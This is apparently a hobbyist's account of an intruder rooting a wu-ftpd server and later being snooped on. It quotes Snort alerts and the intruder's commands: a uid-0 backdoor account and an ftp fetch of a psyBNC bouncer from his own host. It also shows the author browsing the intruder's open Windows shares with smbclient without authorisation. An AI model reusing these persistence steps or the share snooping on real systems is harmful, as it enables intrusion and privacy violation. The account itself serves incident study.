| MASTER-0N So.. you wanted to know about MASTER-0N? Okay.. there goes. On June 21th, snort alerted me about someone doing something to the default wu-ftpd on my leetle RedHat box: (note I changed my IP-address to 10.0.0.14) 06/21-18:41:09.662606 [**] [1:1424:3] SHELLCODE x86 EB OC NOOP [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 203.238.85.131:45703 -> 10.0.0.14:21 Ah.. executable code. nice. But then something nasty turned up: 06/21-18:41:14.509693 [**] [1:498:2] ATTACK RESPONSES id check returned root [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 10.0.0.14:21 -> 203.238.85.131:45703 MASTER-0N gained root.. Pesky little rodent. It seems he wanted to be sure he did it, so he exploited the bug again, gaining root just as he did the first time. After gaining root for the second time he checked if someone was logged in and because there wasn't anyone, went on, giving user 'daemon' a password (censored): w Ok, now he could log in as 'daemon'. But still no root.. So let's add a user with uid 0: /usr/sbin/useradd uid -u 0
-d /bin -s /bin/bash Now he could log in as 'daemon' and su to 'uid' and do whatever he wanted. So he did. login: daemon Let's step aside here.. Something stupid happened. Because I hacked up bash and put it in /sbin, the directory the kiddo came in on was /sbin. That was odd, so he did an 'ls'. Didn't notice the /sbin/bash though :) [root@hostname /sbin]# ls Ok.. he was confident he was 'Tha leader pimp', so he continued. Ofcourse this wu-ftpd would be hacked soon if he didn't close the hole. He tried to do that with: [root@hostname /sbin]# echo
"ftp" >>/etc/ftpusers Ok. .hole closed. Let's install psy! [root@hostname /sbin]# cd /dev//ida Connected to www.master0n.0catch.com. 230-You are user #63 of 6000
simultaneous users allowed. 200 PORT command successful. ftp> get psybnc.tgz local: psybnc.tgz remote: psybnc.tgz [root@hostname ida]# tar xzvf
psybnc.tgz [root@hostname ppp]# make `-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-' So.. his bouncer was up and running. After a while he connected to the bouncer, set up an account for himself and joined his favorite IRC channels. Boring as those are he soon left. But the psybnc connection to the server was there, waiting to be logged. 600KB of Trivia shit.. man.. this kiddo just sucked. Luckily there came MiCrobul :) MiCrobul was not nice to MASTER-0N. He killed the running psybnc and might as well have deleted the user 'uid' and changed 'daemon'. Anyway.. MASTER-0N noticed his bouncer was down on June 22th and checked if the box was still up: 06/22-13:41:49.569333 [**] [1:382:4] ICMP PING Windows [**] [Classification: Misc activity] [Priority: 3] {ICMP} 80.96.71.98 -> 10.0.0.14 Wow, that's a windows-box! Guess that 80.96.71.98 is his home-IP (he used this IP to connect with his psybnc, but I didn't investigate at that time). Let's try a little NetBIOS snooping around. user@hostname:~$ nmblookup
-A 80.96.71.98 user@hostname:~$
smbclient -L //CONTOR -I 80.96.71.98 Server Comment Workgroup Master user@hostname:~$ smbclient //contor/c -I 80.96.71.98 smb: \> ls Okay.. this kid is an idiot. His drives shared for the whole world. But now look at E: smb: \> ls Does your mom know this MASTER-0N? Anyway, there's nothing of value on that disks, not easily extracted anyway. So I let him be. But good fun this one was :)
|